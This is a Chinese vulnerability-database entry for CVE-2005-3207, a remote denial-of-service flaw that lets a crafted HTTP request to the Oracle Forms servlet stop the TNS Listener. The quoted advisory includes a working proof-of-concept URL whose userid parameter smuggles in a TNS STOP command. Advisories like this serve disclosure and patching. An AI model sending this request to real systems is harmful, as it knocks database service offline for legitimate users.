Oracle Forms Servlet TNS Listener远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109113 漏洞类型 访问验证错误
发布时间 2005-10-07 更新时间 2006-01-19
CVE编号 CVE-2005-3207 CNNVD-ID CNNVD-200510-103
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26336
https://cxsecurity.com/issue/WLB-2005100025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-103
|漏洞详情
OracleFusionMiddleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。OracleForms是其中的一个用于开发Web数据库应用程序的工具集组件。。OracleForms中的漏洞允许远程攻击者通过发布特殊的HTTP请求终止TNSListener服务,拒绝合法用户的进一步数据库服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/15039/info

Oracle Forms is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.

By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

This issue was reported in Oracle Forms versions prior to July 2005.

This issue was originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID. 

http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES
|参考资料

来源:MISC
链接:http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html
来源:XF
名称:oracle-forms-tns-dos(22543)
链接:http://xforce.iss.net/xforce/xfdb/22543
来源:BID
名称:15039
链接:http://www.securityfocus.com/bid/15039
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_forms_shutdown.html
来源:SECUNIA
名称:15991
链接:http://secunia.com/advisories/15991/
来源:BUGTRAQ
名称:20051007ShutdownTNSListenerviaOracleFormsServlet
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112870645720399&w=2
来源:FULLDISC
名称:20051007ShutdownTNSListenerviaOracleFormsServlet
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0175.html
来源:SREASON
名称:65
链接:http://securityreason.com/securityalert/65